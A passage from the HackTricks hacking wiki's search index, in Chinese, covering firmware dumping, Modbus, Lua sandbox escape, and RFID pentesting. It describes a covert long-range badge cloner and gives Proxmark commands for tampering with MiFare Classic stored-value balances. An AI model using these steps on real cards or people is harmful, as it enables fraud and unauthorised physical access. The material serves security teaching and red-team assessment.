将EEPROM内存与CH341a编程器连接,并将设备插入计算机。如果设备未被检测到,请尝试在计算机上安装驱动程序。此外,请确保EEPROM以正确的方向连接(通常,将VCC引脚放置在与USB连接器相反的方向),否则软件将无法检测到芯片。如有需要,请参考图示: drawing drawing 最后,使用flashrom、G-Flash(GUI)等软件转储固件。G-Flash是一个快速的最小GUI工具,能够自动检测EEPROM。这在需要快速提取固件时非常有帮助,而无需过多调整文档。 drawing 转储固件后,可以对二进制文件进行分析。可以使用strings、hexdump、xxd、binwalk等工具提取有关固件以及整个文件系统的大量信息。 要从固件中提取内容,可以使用binwalk。Binwalk分析十六进制签名并识别二进制文件中的文件,并能够提取它们。 binwalk -e 可以是 .bin 或 .rom,具体取决于使用的工具和配置。 caution 请注意,固件提取是一个精细的过程,需要大量的耐心。任何处理不当都可能导致固件损坏甚至完全擦除,使设备无法使用。建议在尝试提取固件之前研究特定设备。","breadcrumbs":"Hardware Hacking » SPI » CH341A EEPROM编程器和读取器","id":"10303","title":"CH341A EEPROM编程器和读取器"},"10304":{"body":"请注意,即使 Pirate Bus 的引脚图指示用于连接 SPI 的 MOSI 和 MISO 引脚,某些 SPI 可能将引脚标记为 DI 和 DO。 MOSI -> DI, MISO -> DO 在 Windows 或 Linux 上,您可以使用程序 flashrom 来转储闪存内容,运行类似以下命令: bash # In this command we are indicating:\\n# -VV Verbose\\n# -c The chip (if you know it better, if not, don\'tindicate it and the program might be able to find it)\\n# -p In this case how to contact th chip via the Bus Pirate\\n# -r Image to save in the filesystem\\nflashrom -VV -c \\"W25Q64.V\\" -p buspirate_spi:dev=COM3 -r flash_content.img tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Hardware Hacking » SPI » Bus Pirate + flashrom","id":"10304","title":"Bus Pirate + flashrom"},"10305":{"body":"Reading time: 4 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Industrial Control Systems Hacking » 工业控制系统黑客技术","id":"10305","title":"工业控制系统黑客技术"},"10306":{"body":"本节包含有关工业控制系统的所有内容,包括概念以及利用各种安全问题进行黑客攻击的方法。 工业控制系统无处不在,因为工业对国家的经济发展至关重要。但这些ICS难以更新,且在该领域的进展较少。因此,发现安全漏洞在这里很常见。这里使用的大多数协议和标准是在90年代开发的,与当前的攻击场景相比,能力较弱。 保护这些系统变得重要,因为破坏它们可能会造成巨大的经济损失,甚至在最坏的情况下危及生命。要理解工业控制系统的安全性,了解它们的内部结构是必要的。 由于工业控制系统是按照设定标准安装的,了解每个组件将有助于将控制系统中的其他机制互联。像PLC和SCADA系统这样的设备在不同工业中的安装方式各异,因此信息收集至关重要。 工业控制系统有时可能会很复杂,因此在进行任何操作时需要大量耐心。在计划攻击和开发任何漏洞之前,所有的工作都是关于探测和侦察。 这些技术也可以用于保护工业控制系统免受攻击和进行蓝队防御。 tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Industrial Control Systems Hacking » 关于本节","id":"10306","title":"关于本节"},"10307":{"body":"Reading time: 6 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Industrial Control Systems Hacking » Modbus Protocol » Modbus协议","id":"10307","title":"Modbus协议"},"10308":{"body":"Modbus协议是工业自动化和控制系统中广泛使用的协议。Modbus允许可编程逻辑控制器(PLC)、传感器、执行器和其他工业设备之间的通信。理解Modbus协议至关重要,因为这是ICS中使用最广泛的通信协议,并且具有大量的潜在攻击面,可以进行嗅探甚至向PLC注入命令。 在这里,概念以要点形式陈述,提供协议及其操作性质的背景。ICS系统安全的最大挑战是实施和升级的成本。这些协议和标准是在80年代和90年代早期设计的,至今仍被广泛使用。由于一个行业有很多设备和连接,升级设备非常困难,这使得黑客在处理过时协议时占据了优势。对Modbus的攻击几乎是不可避免的,因为它将在没有升级的情况下使用,而其操作对行业至关重要。","breadcrumbs":"Industrial Control Systems Hacking » Modbus Protocol » Modbus协议简介","id":"10308","title":"Modbus协议简介"},"10309":{"body":"Modbus协议通常用作客户端-服务器架构,其中主设备(客户端)与一个或多个从设备(服务器)发起通信。这也被称为主从架构,广泛用于电子和物联网中,如SPI、I2C等。","breadcrumbs":"Industrial Control Systems Hacking » Modbus Protocol » 客户端-服务器架构","id":"10309","title":"客户端-服务器架构"},"1031":{"body":"当 load/loadstring/loadfile 可达但 io/os 受限时,执行精心构造的 Lua bytecode 可能导致内存泄露和破坏原语。要点: Lua ≤ 5.1 随附了一个 bytecode verifier,该 verifier 有已知的 bypasses。 Lua 5.2 完全移除了该 verifier(官方立场:应用应直接拒绝 precompiled chunks),如果不禁止 bytecode loading 则扩大了攻击面。 典型工作流:通过 in-VM 输出 leak 指针,构造 bytecode 以制造 type confusions(例如围绕 FORLOOP 或其他 opcodes),然后枢转为 arbitrary read/write 或 native code execution。 此路径依赖于引擎/版本并需 RE。详见参考以获取深入分析、利用原语和在游戏中的示例 gadgetry。","breadcrumbs":"Lua Sandbox Escape » 可选升级:abusing Lua bytecode loaders","id":"1031","title":"可选升级:abusing Lua bytecode loaders"},"10310":{"body":"Modbus协议设计用于串行通信和以太网通信。串行通信在遗留系统中广泛使用,而现代设备支持以太网,提供更高的数据传输速率,更适合现代工业网络。","breadcrumbs":"Industrial Control Systems Hacking » Modbus Protocol » 串行和以太网版本","id":"10310","title":"串行和以太网版本"},"10311":{"body":"数据在Modbus协议中以ASCII或二进制形式传输,尽管由于与旧设备的兼容性,通常使用二进制格式。","breadcrumbs":"Industrial Control Systems Hacking » Modbus Protocol » 数据表示","id":"10311","title":"数据表示"},"10312":{"body":"ModBus协议通过传输特定的功能代码来操作PLC和各种控制设备。这部分很重要,因为重放攻击可以通过重新传输功能代码来实现。遗留设备不支持任何数据传输加密,通常有长电缆连接,这导致这些电缆被篡改和捕获/注入数据。","breadcrumbs":"Industrial Control Systems Hacking » Modbus Protocol » 功能代码","id":"10312","title":"功能代码"},"10313":{"body":"网络中的每个设备都有一些唯一地址,这对于设备之间的通信至关重要。像Modbus RTU、Modbus TCP等协议用于实现寻址,并作为数据传输的传输层。传输的数据是Modbus协议格式,包含消息。 此外,Modbus还实现了错误检查,以确保传输数据的完整性。但最重要的是,Modbus是一个开放标准,任何人都可以在其设备中实现。这使得该协议成为全球标准,并在工业自动化行业中广泛应用。 由于其大规模使用和缺乏升级,攻击Modbus提供了显著的优势,具有广泛的攻击面。ICS高度依赖设备之间的通信,任何对它们的攻击都可能对工业系统的操作造成危险。如果攻击者识别出传输媒介,可以进行重放、数据注入、数据嗅探和泄露、拒绝服务、数据伪造等攻击。 tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Industrial Control Systems Hacking » Modbus Protocol » Modbus的寻址","id":"10313","title":"Modbus的寻址"},"10314":{"body":"Reading time: 1 minute tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Radio Hacking » 无线电黑客","id":"10314","title":"无线电黑客"},"10315":{"body":"Reading time: 8 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Radio Hacking » Maxiprox Mobile Cloner » 构建便携式 HID MaxiProx 125 kHz 移动克隆器","id":"10315","title":"构建便携式 HID MaxiProx 125 kHz 移动克隆器"},"10316":{"body":"将一个主电源供电的 HID MaxiProx 5375 长距离 125 kHz 读卡器转变为一个可在现场部署的、由电池供电的徽章克隆器,能够在物理安全评估期间静默收集接近卡。 这里的转换基于 TrustedSec 的“让我们克隆一个克隆器 - 第 3 部分:将一切结合在一起”研究系列,结合了机械、电气和射频方面的考虑,以便最终设备可以放入背包并立即在现场使用。 warning 操作主电源供电的设备和锂离子电源银行可能是危险的。在通电电路之前,请验证每个连接,并保持天线、同轴电缆和接地平面与工厂设计完全一致,以避免调谐失效。","breadcrumbs":"Radio Hacking » Maxiprox Mobile Cloner » 目标","id":"10316","title":"目标"},"10317":{"body":"HID MaxiProx 5375 读卡器(或任何 12 V HID Prox® 长距离读卡器) ESP RFID Tool v2.2(基于 ESP32 的 Wiegand 嗅探器/记录器) USB-PD(电源传输)触发模块,能够协商 12 V @ ≥3 A 100 W USB-C 电源银行(输出 12 V PD 配置文件) 26 AWG 硅胶绝缘连接线 - 红/白 面板安装 SPST 切换开关(用于蜂鸣器杀开关) NKK AT4072 开关保护盖/防意外盖 焊接铁、焊锡吸取带和除焊泵 ABS 级手动工具:锯、刀、平头和半圆锉 钻头 1/16″(1.5 mm)和 1/8″(3 mm) 3 M VHB 双面胶带和扎带","breadcrumbs":"Radio Hacking » Maxiprox Mobile Cloner » 材料清单 (BOM)","id":"10317","title":"材料清单 (BOM)"},"10318":{"body":"拆除并移除用于生成 5 V 逻辑 PCB 的工厂降压转换器子板。 在 ESP RFID Tool 旁边安装 USB-PD 触发器,并将触发器的 USB-C 插口引导到外壳外部。 PD 触发器从电源银行协商 12 V,并直接供电给 MaxiProx(读卡器原生期望 10–14 V)。从 ESP 板获取一个次级 5 V 电源轨以供电任何配件。 100 W 电池组紧贴内部支撑安装,以确保 没有 电源线悬挂在铁氧体天线附近,从而保持射频性能。","breadcrumbs":"Radio Hacking » Maxiprox Mobile Cloner » 1. 电源子系统","id":"10318","title":"1. 电源子系统"},"10319":{"body":"找到 MaxiProx 逻辑板上的两个扬声器焊盘。 清理 两个 焊盘,然后仅重新焊接 负 焊盘。 将 26 AWG 线(白色 = 负,红色 = 正)焊接到蜂鸣器焊盘,并通过新切割的槽引导到面板安装的 SPST 开关。 当开关打开时,蜂鸣器电路被切断,读卡器在完全静默中操作 - 适合隐秘的徽章收集。 在切换开关上安装 NKK AT4072 弹簧加载安全盖。小心地用锯/锉扩大孔径,直到它卡在开关主体上。保护盖防止在背包内意外激活。","breadcrumbs":"Radio Hacking » Maxiprox Mobile Cloner » 2. 蜂鸣器杀开关 - 静音操作","id":"10319","title":"2. 蜂鸣器杀开关 - 静音操作"},"1032":{"body":"Server side:拒绝或重写用户脚本;白名单安全 API;移除或绑定为空 io、os、load/loadstring/loadfile/dofile、package.loadlib、debug、ffi。 Client side:以最小 _ENV 运行 Lua,禁止 bytecode loading,重新引入严格的 bytecode verifier 或签名校验,并阻止客户端进程创建子进程。 Telemetry:在脚本加载后不久对 gameclient → child process creation 发出告警;与 UI/chat/script 事件做关联分析。","breadcrumbs":"Lua Sandbox Escape » 检测与加固说明(供防御者)","id":"1032","title":"检测与加固说明(供防御者)"},"10320":{"body":"• 使用平头剪刀,然后用刀和锉 去除 内部 ABS “凸起”,使大型 USB-C 电池平放在支撑上。 • 在外壳壁上雕刻两个平行通道以容纳 USB-C 电缆;这将电池锁定到位并消除移动/振动。 • 为电池的 电源 按钮创建一个矩形开口: 在位置上贴上纸质模板。 在四个角钻 1/16″ 导向孔。 用 1/8″ 钻头扩大孔。 用锯连接孔;用锉修整边缘。 ✱ 避免使用旋转 Dremel - 高速钻头会熔化厚 ABS 并留下难看的边缘。","breadcrumbs":"Radio Hacking » Maxiprox Mobile Cloner » 3. 外壳与机械工作","id":"10320","title":"3. 外壳与机械工作"},"10321":{"body":"重新安装 MaxiProx 逻辑板,并重新焊接 SMA 尾线到读卡器的 PCB 地面焊盘。 使用 3 M VHB 安装 ESP RFID Tool 和 USB-PD 触发器。 用扎带整理所有电线,保持电源线 远离 天线环。 拧紧外壳螺丝,直到电池轻微压缩;内部摩擦防止在每次读取卡片后设备发生位移。","breadcrumbs":"Radio Hacking » Maxiprox Mobile Cloner » 4. 最终组装","id":"10321","title":"4. 最终组装"},"10322":{"body":"使用 125 kHz Pupa 测试卡,便携式克隆器在自由空气中实现了 ≈ 8 cm 的一致读取 - 与主电源供电操作相同。 将读卡器放置在薄壁金属现金箱内(模拟银行大堂桌子)将范围减少到 ≤ 2 cm,确认大金属外壳作为有效的射频屏蔽。","breadcrumbs":"Radio Hacking » Maxiprox Mobile Cloner » 5. 范围与屏蔽测试","id":"10322","title":"5. 范围与屏蔽测试"},"10323":{"body":"充电 USB-C 电池,连接电池,并翻转主电源开关。 (可选)打开蜂鸣器保护盖,在台式测试时启用声音反馈;在隐秘现场使用前锁定。 走过目标徽章持有者 - MaxiProx 将激活卡片,ESP RFID Tool 捕获 Wiegand 流。 通过 Wi-Fi 或 USB-UART 转储捕获的凭据,并根据需要重放/克隆。","breadcrumbs":"Radio Hacking » Maxiprox Mobile Cloner » 使用工作流程","id":"10323","title":"使用工作流程"},"10324":{"body":"症状 可能原因 修复 读卡器在卡片呈现时重启 PD 触发器协商了 9 V 而不是 12 V 验证触发器跳线/尝试更高功率的 USB-C 电缆 无读取范围 电池或电线放置在 天线 上 重新布线并保持铁氧体环周围 2 cm 的间隙 蜂鸣器仍然鸣叫 开关接在正极而不是负极 移动杀开关以切断 负 扬声器线路","breadcrumbs":"Radio Hacking » Maxiprox Mobile Cloner » 故障排除","id":"10324","title":"故障排除"},"10325":{"body":"让我们克隆一个克隆器 - 第 3 部分 (TrustedSec) tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Radio Hacking » Maxiprox Mobile Cloner » 参考文献","id":"10325","title":"参考文献"},"10326":{"body":"Reading time: 15 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Radio Hacking » Pentesting RFID » Pentesting RFID","id":"10326","title":"Pentesting RFID"},"10327":{"body":"Radio Frequency Identification (RFID) 是最常见的短距离无线方案。它通常用于存储和传输用于识别实体的信息。 RFID 标签可以依赖于 自身电源(active) ,例如内置电池,或者通过读取天线使用接收无线电波所感应的电流来获取电源( passive )。","breadcrumbs":"Radio Hacking » Pentesting RFID » 介绍","id":"10327","title":"介绍"},"10328":{"body":"EPCglobal 将 RFID 标签分为六类。每一类标签都具有前一类中列出的所有功能,从而实现向后兼容。 Class 0 标签是运行在 UHF 频段的 被动 标签。厂商在生产时 预编程 它们。因此,你 无法更改 存储在其内存中的信息。 Class 1 标签也可以在 HF 频段工作。此外,它们可以在生产后 一次性写入 。许多 Class 1 标签还能处理它们接收命令的 循环冗余校验(CRCs) 。CRC 是命令末尾用于错误检测的几个额外字节。 Class 2 标签可以 多次写入 。 Class 3 标签可以包含可以记录环境参数(例如当前温度或标签运动)的 嵌入式传感器 。这些标签是 半被动 的,因为尽管它们 有 嵌入式电源(例如集成 电池 ),但它们 不能主动 与其他标签或读卡器发起无线 通信 。 Class 4 标签可以与同一类的其他标签发起通信,使其成为 主动标签 。 Class 5 标签可以为其他标签 提供电力并与之前所有的标签类通信 。Class 5 标签可以充当 RFID readers 。","breadcrumbs":"Radio Hacking » Pentesting RFID » 分类","id":"10328","title":"分类"},"10329":{"body":"RFID 标签的内存通常存储四类数据:用于识别标签所附实体的 识别数据 (此数据包含用户定义字段,如银行账户);提供有关实体 更多细节 的 补充数据 ;用于标签内部 配置 的 控制数据 ;以及包含标签唯一标识符( UID )和有关标签 生产 、 类型 和 供应商 的详细信息的 制造商数据 。前两类数据在所有商业标签中都能找到;后两类则可能因标签供应商而异。 ISO 标准指定了 Application Family Identifier( AFI )的值,这是一个指示标签所属 对象类型 的代码。另一个由 ISO 指定的重要寄存器是 Data Storage Format Identifier( DSFID ),它定义了 用户数据的逻辑组织 。 大多数 RFID 安全控制 具有限制对每个用户内存块以及包含 AFI 和 DSFID 值的特殊寄存器的 读 或 写 操作的机制。这些 锁定机制 使用存储在控制内存中的数据,并由供应商预配置 默认密码 ,但允许标签所有者 配置自定义密码 。","breadcrumbs":"Radio Hacking » Pentesting RFID » RFID 标签中存储的信息","id":"10329","title":"RFID 标签中存储的信息"},"1033":{"body":"This House is Haunted: a decade old RCE in the AION client (housing Lua VM) Bytecode Breakdown: Unraveling Factorio\'s Lua Security Flaws lua-l (2009): Discussion on dropping the bytecode verifier Exploiting Lua 5.1 bytecode (gist with verifier bypasses/notes) tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Lua Sandbox Escape » References","id":"1033","title":"References"},"10330":{"body":"","breadcrumbs":"Radio Hacking » Pentesting RFID » 低频与高频标签比较","id":"10330","title":"低频与高频标签比较"},"10331":{"body":"低频标签 常用于 不需要高安全性 的系统:楼宇门禁、对讲钥匙、健身房会员卡等。由于它们的读距较大,因此在付费停车场非常方便:驾驶员不需要将卡靠近读卡器,因为它可以从较远处被触发。与此同时,低频标签非常原始,数据传输速率低。因此,无法为诸如余额保持和加密等功能实现复杂的双向数据传输。低频标签只传输它们的短 ID,且没有任何身份验证手段。 这些设备依赖于 被动 的 RFID 技术并在 30 kHz 到 300 kHz 的范围内工作,尽管更常用的是 125 kHz 到 134 kHz: 远距离 — 更低的频率意味着更高的读距。有些 EM-Marin 和 HID 的读卡器可以在约一米的距离工作。这些通常用于停车场。 原始协议 — 由于低数据传输速率,这些标签只能传输其短 ID。在大多数情况下,数据不经过身份验证且不以任何方式保护。只要卡处于读卡器范围内,它就开始传输其 ID。 低安全性 — 这些卡很容易被复制,甚至因为协议的原始性而可能从别人衣袋中被读取。 流行的 125 kHz 协议: EM-Marin — EM4100, EM4102。在独联体地区最流行的协议。由于其简单性和稳定性,可从大约一米处读取。 HID Prox II — 由 HID Global 推出的低频协议。该协议在西方国家更为流行。它更复杂,且该协议的卡和读卡器相对昂贵。 Indala — 非常古老的低频协议,最初由 Motorola 引入,后来被 HID 收购。与前两者相比,你在野外遇到它的可能性较小,因为它正在逐渐被淘汰。 实际上,还有更多低频协议。但它们在物理层上都使用相同的调制,并且可以在某种程度上被视为上述协议的变体。","breadcrumbs":"Radio Hacking » Pentesting RFID » 低频 RFID 标签(125kHz)","id":"10331","title":"低频 RFID 标签(125kHz)"},"10332":{"body":"你可以使用 Flipper Zero 攻击这些标签: FZ - 125kHz RFID","breadcrumbs":"Radio Hacking » Pentesting RFID » 攻击","id":"10332","title":"攻击"},"10333":{"body":"高频标签 用于需要加密、大量双向数据传输、身份验证等更复杂的读写器-标签交互场景。 它们通常出现在银行卡、公共交通和其他安全通行证中。 13.56 MHz 高频标签是一组标准和协议 。它们通常被称为 NFC ,但这并非总是准确。物理和逻辑层上使用的基本协议集是 ISO 14443。高级协议以及替代标准(如 ISO 19092)基于它。许多人将这项技术称为 Near Field Communication (NFC) ,这是一个描述在 13.56 MHz 频率上运行设备的术语。 简单来说,NFC 的架构如下:传输协议由制造卡的公司选择并基于低层的 ISO 14443 实现。例如,NXP 发明了自己的高级传输协议 Mifare。但在较低层,Mifare 卡基于 ISO 14443-A 标准。 Flipper 可以与低层的 ISO 14443 协议以及 Mifare Ultralight 数据传输协议和用于银行卡的 EMV 进行交互。我们正在努力添加对 Mifare Classic 和 NFC NDEF 的支持。对构成 NFC 的协议和标准的深入考察值得另写一篇文章,我们计划稍后发布。 所有基于 ISO 14443-A 标准的高频卡都有一个唯一的芯片 ID。它充当卡的序列号,就像网络卡的 MAC 地址一样。 通常,UID 长度为 4 或 7 字节 ,但极少数情况下可以 达到 10 字节 。UID 不是秘密,它们很容易被读取, 有时甚至印在卡片上 。 许多门禁系统依赖 UID 来 进行身份验证并授予访问权限 。有时即使 RFID 标签 支持加密 也会这样使用。这种 误用 使它们在 安全性 上与原始的 125 kHz 卡 处于同一水平。虚拟卡(如 Apple Pay)使用动态 UID,以便手机用户不会通过支付应用打开门禁。 短距离 — 高频非接触卡专门设计为必须将其放在靠近读卡器的位置。这也有助于保护卡片免受未经授权的交互。我们曾实现的最大读取距离约为 15 cm,那还是使用定制的高距离读卡器时的记录。 高级协议 — 高达 424 kbps 的数据传输速率允许复杂协议实现完整的双向数据传输,从而 支持加密 、数据传输等功能。 高安全性 — 高频非接触卡在任何方面都不逊色于智能卡。有些卡支持像 AES 这样的强加密算法并实现非对称加密。","breadcrumbs":"Radio Hacking » Pentesting RFID » 高频 RFID 标签(13.56 MHz)","id":"10333","title":"高频 RFID 标签(13.56 MHz)"},"10334":{"body":"你可以使用 Flipper Zero 攻击这些标签: FZ - NFC 或者使用 proxmark : Proxmark 3","breadcrumbs":"Radio Hacking » Pentesting RFID » 攻击","id":"10334","title":"攻击"},"10335":{"body":"当系统将货币余额直接存储在 MiFare Classic 卡上时,你通常可以操纵它,因为 Classic 使用 NXP 已弃用的 Crypto1 密码算法。Crypto1 多年已被破解,允许使用普通硬件(例如 Proxmark3)恢复扇区密钥并对卡内存进行完全读/写。 端到端工作流程(概述): Dump the original card and recover keys bash # Attempt all built-in Classic key recovery attacks and dump the card\\nhf mf autopwn 这通常会恢复扇区密钥 (A/B),并在 client dumps 文件夹中生成完整卡片 dump。 定位并理解 value/integrity 字段 对原始卡执行合法充值(top-ups),并在充值前后获取多个 dumps。 对两个 dumps 做 diff,以识别表示余额和任何完整性字段的变化的块/字节。 许多 Classic 部署要么使用原生的 \\"value block\\" 编码,要么自定义校验和(例如对余额与另一个字段及常数做 XOR)。在更改余额后,需相应地重新计算完整性字节,并确保所有重复/补码字段一致。 将修改后的 dump 写入可写的 “Chinese magic” Classic tag bash # Load a modified binary dump onto a UID-changeable Classic tag\\nhf mf cload -f modified.bin 克隆原始 UID,使终端识别该卡 bash # Set the UID on a UID-changeable tag (gen1a/gen2 magic)\\nhf mf csetuid -u 在终端使用 信任卡上余额和 UID 的读卡器会接受被篡改的卡。现场观察显示许多部署基于字段宽度对余额进行上限限制(例如 16-bit fixed-point)。 Notes 如果系统使用原生 Classic value blocks,请记住格式:value (4B) + ~value (4B) + value (4B) + block address + ~address。所有部分必须匹配。 对于带简单校验和的自定义格式,差分分析是推导完整性函数而无需反向固件的最快方法。 只有可更改 UID 的标签(\\"Chinese magic\\" gen1a/gen2)允许写入 block 0/UID。普通 Classic 卡的 UID 是只读的。 For hands-on Proxmark3 commands, see: Proxmark 3","breadcrumbs":"Radio Hacking » Pentesting RFID » MiFare Classic offline stored-value tampering (broken Crypto1)","id":"10335","title":"MiFare Classic offline stored-value tampering (broken Crypto1)"},"10336":{"body":"如果你在 red-team 演练中需要用来采集 HID Prox® 门禁卡的 长距离 、 电池供电 解决方案,你可以将壁挂式 HID MaxiProx 5375 读卡器改装成一个可装入背包的自包含克隆器。完整的机械和电气拆解请见: Maxiprox Mobile Cloner","breadcrumbs":"Radio Hacking » Pentesting RFID » 制作便携式 HID MaxiProx 125 kHz Mobile Cloner","id":"10336","title":"制作便携式 HID MaxiProx 125 kHz Mobile Cloner"},"10337":{"body":"https://blog.flipperzero.one/rfid/ Let\'s Clone a Cloner – Part 3 (TrustedSec) NXP statement on MIFARE Classic Crypto1 MIFARE security overview (Wikipedia) NFC card vulnerability exploitation in KioSoft Stored Value (SEC Consult) tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Radio Hacking » Pentesting RFID » 参考资料","id":"10337","title":"参考资料"},"10338":{"body":"Reading time: 11 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Radio Hacking » Infrared » 红外线","id":"10338","title":"红外线"},"10339":{"body":"红外光对人类是不可见的 。红外波长范围为 0.7到1000微米 。家用遥控器使用红外信号进行数据传输,工作波长范围为0.75..1.4微米。遥控器中的微控制器使红外LED以特定频率闪烁,将数字信号转换为红外信号。 接收红外信号使用 光接收器 。它 将红外光转换为电压脉冲 ,这些脉冲已经是 数字信号 。通常,接收器内部有一个 暗光滤波器 ,只允许 所需波长通过 ,并切除噪声。","breadcrumbs":"Radio Hacking » Infrared » 红外线的工作原理","id":"10339","title":"红外线的工作原理"},"1034":{"body":"Reading time: 6 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Archive Extraction Path Traversal » Archive Extraction Path Traversal (\\"Zip-Slip\\" / WinRAR CVE-2025-8088)","id":"1034","title":"Archive Extraction Path Traversal (\\"Zip-Slip\\" / WinRAR CVE-2025-8088)"},"10340":{"body":"红外协议在三个因素上有所不同: 位编码 数据结构 载波频率——通常在36..38 kHz范围内 位编码方式 1. 脉冲间距编码 通过调制脉冲之间的间隔持续时间来编码位。脉冲本身的宽度是恒定的。 2. 脉冲宽度编码 通过调制脉冲宽度来编码位。脉冲爆发后的间隔宽度是恒定的。 3. 相位编码 也称为曼彻斯特编码。逻辑值由脉冲爆发与间隔之间的过渡极性定义。“间隔到脉冲爆发”表示逻辑“0”,“脉冲爆发到间隔”表示逻辑“1”。 4. 之前编码方式的组合及其他特殊方式 tip 有些红外协议 试图成为多种设备的通用协议 